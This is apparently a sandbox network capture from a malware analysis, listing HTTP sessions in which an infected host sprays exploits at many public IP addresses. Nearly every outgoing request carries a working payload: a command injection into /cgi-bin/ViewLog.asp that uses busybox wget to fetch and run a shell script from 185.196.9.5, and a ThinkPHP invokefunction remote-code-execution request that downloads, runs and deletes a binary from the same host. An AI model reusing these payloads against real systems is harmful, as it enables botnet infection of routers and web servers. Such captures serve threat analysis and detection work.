Feb 25, 2024 19:04:02.814573050 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
634	192.168.2.15	51250	31.200.71.122	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.819358110 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
635	192.168.2.15	39874	85.105.198.3	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.821089029 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:03.042742968 CET	165	IN	HTTP/1.1 307 Temporary Redirect Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://185.196.9.5:80/cgi-bin/ViewLog.asp Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
636	192.168.2.15	44682	62.29.81.238	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.823513031 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
637	192.168.2.15	46340	94.131.62.166	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.847482920 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:02.946557999 CET	1260	IN	HTTP/1.1 400 Bad Request Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 18:04:02 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3572 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, s

Session ID	Source IP	Source Port	Destination IP	Destination Port
638	192.168.2.15	45414	94.253.14.209	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.889780045 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
639	192.168.2.15	48548	31.136.38.227	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.931003094 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:03.493607998 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:04.613611937 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:06.885577917 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:11.493591070 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:20.453625917 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:38.373245955 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:15.236819983 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
640	192.168.2.15	45044	94.255.177.204	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:03.023716927 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:03.252652884 CET	340	IN	HTTP/1.1 302 Found Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: keep-alive Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=QtJAqwieSJAQ0LkDvuIIfnToTIsdZJrcZKiUswnP; path=/ Pragma: no-cache Location: http://185.196.9.5:80/index.jsp Content-Length: 0 Date: Sun, 25 Feb 2024 19:03:46 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port
641	192.168.2.15	55224	94.122.113.106	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:03.043145895 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
642	192.168.2.15	53482	94.121.113.217	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:03.596149921 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
643	192.168.2.15	45832	95.67.14.102	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:03.647690058 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:03.857289076 CET	450	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:03 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
644	192.168.2.15	32998	95.66.253.222	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:03.657285929 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:03.873318911 CET	317	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Sun, 25 Feb 2024 18:03:49 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
645	192.168.2.15	60200	95.57.134.132	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:03.710412979 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:03.980815887 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:04:03.980895042 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
646	192.168.2.15	34388	112.136.130.141	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:04.137667894 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
647	192.168.2.15	56630	112.213.110.58	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:04.176424026 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:04.498799086 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:04 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
648	192.168.2.15	54804	31.200.85.233	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:04.841527939 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
649	192.168.2.15	52428	94.120.161.138	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:04.841619015 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
650	192.168.2.15	42572	94.121.152.154	8080

Timestamp	Bytes transferred	Direction	Data
